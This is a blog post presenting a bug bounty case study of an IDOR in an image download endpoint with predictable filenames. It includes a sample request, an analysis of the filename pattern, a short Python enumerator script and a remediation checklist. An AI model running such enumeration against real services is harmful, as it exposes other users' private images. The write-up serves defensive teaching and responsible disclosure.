How a Simple Image Download Feature Became a Full IDOR Enumeration Attack

How a Simple Image Download Feature Became a Full IDOR Enumeration Attack

December 14, 2025 7 min read

A real-world bug bounty case study showing how a simple image downloader exposed user data through predictable identifiers, leading to an enumeration-based IDOR.




⚠️ Disclaimer

This write-up is educational and defensive. All testing described was performed with permission or on controlled accounts. Do not test targets you do not own or for which you lack explicit authorization.


Introduction

Ordinary features are where the best bugs hide. A background-image removal tool, a temporary storage bucket, a simple “download processed image” link - none of these sound dangerous on their own. But when an application uses predictable filenames and serves files without ownership checks, the result is a classic Insecure Direct Object Reference (IDOR) with realistic, automated exploitation potential.

This post reconstructs a real bug bounty case: how an image download endpoint with a single docName parameter turned into a scalable IDOR. The researchers turned a casual curiosity into a repeatable proof-of-concept by reverse-engineering filename structure, building a controlled enumerator, and validating the ability to retrieve other users’ images.

This is written in a neutral, third-person style suitable for engineering teams, bug hunters, and security reviewers. It focuses on reproducible defensive lessons rather than playing the role of a how-to for attackers.


Background: the feature and the initial finding

The application provided an endpoint to download processed images:

GET /ImageDownload/?docName=620239_Researcher_1760364775.jpeg HTTP/1.1
Host: redacted.com
Accept: image/jpeg
Cookie: <user-session>
HTTP

From casual testing the endpoint returned the requested file directly. Two simple experiments showed the problem’s contours:

  1. Upload image under Account A - get filename A.
  2. Upload image under Account B - get filename B.
  3. Substitute filename B into the download URL while authenticated as Account A - the server returned Account B’s image.

Conclusion: the server did not verify that the requesting user owned the docName resource.

At this point the bug was an IDOR candidate. Triage asked a reasonable question: “How would an attacker obtain other users’ filenames?” Answering that required pattern analysis and enumeration.

A diagram illustrating an IDOR attack where a browser's GET request parameter is manipulated to fetch another user's image from a server.


Step 1 - Pattern discovery: what is docName made of?

To move from a simple IDOR into an exploit-ready case, the researchers focused on filename patterns. By uploading multiple images and collecting filenames, they identified a stable template:

<id><username><unix_timestamp>.jpeg
Plain text

Typical example:

620239_Researcher_1760364775.jpeg
Plain text

Breaking down the components:

  • id - 6-digit decimal, sequential (incrementing with uploads/accounts).
  • username - the account’s display name as provided at signup.
  • unix_timestamp - numeric seconds since epoch, matching upload time.

Each component is predictable (sequential id; known or guessable username; timestamp in a bounded window). That combination removes the “random secret” assumption and makes brute-forcing feasible.

An infographic breaking down a filename structure into parts: user ID, username, and Unix timestamp, with explanations for each.


Step 2 - Designing an enumeration strategy

With the pattern identified, the goal was to prove real-world feasibility without causing harm.

Constraints and assumptions:

  • Files persist for 30 days. This gives time windows for enumeration.
  • IDs increment globally (or per tenant) - enabling backward enumeration from recent uploads.
  • Usernames are often discoverable or guessable (public profiles, marketing pages, simple derivation).

Enumeration approach:

  1. Start with recent high ID values and iterate downward (IDs likely to correspond to recent uploads).
  2. Generate username candidates: known public names, simple transformations (lowercase, remove spaces), and common names for the site.
  3. Create timestamp windows: assume upload occurred within a plausible range (e.g., last 72 hours) and iterate timestamps at coarse granularity first, refine when needed.
  4. Lightweight checks: send HTTP HEAD or small GET requests to validate availability without downloading massive content. Treat 200 OK as valid and 404 as not found. Rate-limit and respect service constraints.

This approach trades breadth for targeted, logic-driven probing to minimize noise and false positives.


Step 3 - Implementing the controlled prover (safe PoC)

The researchers wrote a small enumerator script (conceptual flow shown here; do not run against in-scope systems without permission):

# Conceptual pseudo-code (replace call_llm with your own safe testing harness).
# This is *not* a distributed bruteforce; it demonstrates logic only.

from time import time, sleep
import requests

def try_filename(base_url, fname, session_cookie):
    url = base_url + "?docName=" + fname
    r = requests.head(url, cookies={'session': session_cookie}, timeout=5)
    return r.status_code == 200

# iterate recent IDs
for id in range(620300, 620200, -1):  # backwards
    for username in ['Researcher','Researcher01','Researcher_1']:
        for ts in range(int(time())-3600*72, int(time()), 60):
            fname = f"{id}_{username}_{ts}.jpeg"
            if try_filename("https://redacted.com/ImageDownload/", fname, "<test-session>"):
                print("Found:", fname)
                sleep(1)  # slow down
Python

The script demonstrates responsible searches by focusing on small windows and adding throttling. The real testing used more sophisticated heuristics to reduce requests and false positives and to avoid impact.

A terminal window showing the output of an enumeration script slowly finding filenames, with a throttle icon and a progress bar.


Step 4 - Practical barriers, false positives & tuning

Enumeration is noisy if performed naively. The team encountered and mitigated several issues:

  • False 404/200 behaviors: some filenames returned 200 but were placeholder images; validating content-length and HTTP headers helps.
  • Timestamp resolution: matching exact second can be hard; using minute-level windows and then refining produced better results.
  • Username normalization: spaces, case, diacritics - canonicalization rules on server side required testing different transformations.
  • Rate limiting & detection: aggressive scans triggered defenses; the final PoC respected rate limits and included backoff.

After several iterations, the PoC reliably discovered real, accessible filenames belonging to other accounts - validating the attack path.


Impact assessment

Why is this more than a “toy” bug?

  • Sensitive content: user-uploaded images can contain faces, IDs, documents - high-value PII.
  • Volume: with automation and thirty-day retention, thousands of images can be enumerated.
  • Ease of exploitation: attacker needs no special privileges, only predictable patterns and a legit account.
  • Chaining potential: exposed images could be used for targeted phishing, blackmail, or social engineering.

CVSS-style considerations (illustrative):

  • Authentication: required (low barrier if account creation is easy).
  • Complexity: low–medium (pattern analysis + automation).
  • Impact: High on confidentiality for exposed images.

Remediation checklist (developer playbook)

Fixes should be layered.

  1. Authorize every download

    • Do not accept client-supplied filenames as an authorization token. Map server-side IDs or tokens to owners and enforce checks.
  2. Use unguessable identifiers

    • Replace predictable filenames with cryptographically random names (UUIDs or random hash strings) unrelated to user data.
  3. Keep file metadata on the server

    • Store { file_id, owner_user_id, original_filename, upload_time } and serve only via GET /download/<file_id> after authorization.
  4. Shorten retention when possible

    • Only retain files as long as necessary and purge expired objects promptly.
  5. Rate-limit and monitor

    • Detect patterns of enumeration: many 404s for sequential IDs or timestamp sweeps.
  6. Content access tokens

    • For temporary public access, generate signed, time-limited URLs (one-time tokens) that map to a specific owner and expire quickly.
  7. Avoid embedding sensitive data in filenames

    • Never include usernames or PII inside storage object names.

A visual checklist of six security remediation steps: Authorize, Randomize, Metadata Server, Retention, Rate-limit, and Signed URLs.


For bug hunters: responsible reporting tips

When you report this class of issue, include:

  • Clear reproduction steps using test accounts (never include real victim data).
  • Evidence of pattern predictability (non-sensitive sample filenames from your own uploads).
  • A concise impact statement: number of objects, retention window, type of likely content.
  • Suggested remediation (server-side mapping, random IDs, authorization checks).

Polite, concrete reports accelerate triage and fixes.


Closing thoughts

Boring endpoints can be dangerous endpoints. This case demonstrates how predictable identifiers + lax authorization create a high-confidence, automatable IDOR. The fix is conceptually simple - authorize, randomize, and minimize exposure - but it requires discipline in design and implementation.

For defenders: treat every user-controlled identifier as untrusted.
For hunters: patient pattern analysis and respectful, well-documented reporting are the keys to turning a curiosity into impact.


References & acknowledgements

  • Case study reconstructed from an anonymized bug bounty write-up and the researcher’s responsibly disclosed report.
  • General IDOR guidance: OWASP Top 10 - Broken Access Control.
  • Practical tips based on common secure file-handling best practices.

Join the Security Intel.

Get weekly VAPT techniques, ethical hacking tools, and zero-day analysis delivered to your inbox.

Weekly Updates No Spam
Herish Chaniyara

Herish Chaniyara

Web Application Penetration Tester (VAPT) & Security Researcher. A Gold Microsoft Student Ambassador and PortSwigger Hall of Fame (#59) member dedicated to securing the web.

Read Next

View all posts

For any queries or professional discussions: herish.chaniyara@gmail.com